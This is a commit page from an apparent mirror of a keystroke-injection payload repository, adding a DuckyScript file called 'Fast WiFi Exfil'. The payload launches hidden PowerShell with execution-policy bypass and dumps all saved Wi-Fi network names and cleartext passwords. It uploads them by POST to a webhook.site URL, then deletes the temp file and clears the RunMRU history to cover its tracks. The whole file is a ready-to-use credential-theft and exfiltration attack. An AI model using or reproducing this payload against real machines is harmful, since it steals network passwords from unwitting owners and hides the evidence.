hak5
/
omg-payloads
mirror of https://github.com/hak5/omg-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #99 from Scrut1ny/patch-1 

Fast WiFi Exfil (Powershell - No RunMRU History)
pull/100/head
hak5glytch 2022-10-17 10:08:37 -07:00 committed by GitHub
parent 9bd555049e 5125e81022
commit bb47bbc869
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 17 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
payloads/library/exfiltration/WiFi_Passwd_Grab/Fast WiFi Exfil (Powershell - No RunMRU History) Normal file
View File

@ -0,0 +1,17 @@
DELAY 1000
GUI r
DELAY 200
STRING powershell -w h -ep bypass "function w{switch -r(netsh wl sh pr){':\s(.+)'{$s=$matches.1;switch -r(netsh wl sh pr n=$s k=clear){'tent.+:\s(.+)'{[PSCustomObject]@{SSID=$s;Pass=$matches.1}}}}}};$w=w;echo $w > $env:tmp\Wi-Fi-PASS"
ENTER
DELAY 100
GUI r
DELAY 200
STRING powershell -w h -ep bypass Invoke-WebRequest -Uri https://webhook.site/<Unique Webhook URL> -Method POST -InFile $env:tmp\Wi-Fi-PASS;Remove-Item $env:tmp\Wi-Fi-PASS -Force -ErrorAction SilentlyContinue
ENTER
DELAY 100
GUI r
DELAY 200
STRING powershell -w h -ep bypass Remove-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU -Name * -ErrorAction SilentlyContinue
ENTER
DELAY 100
EXIT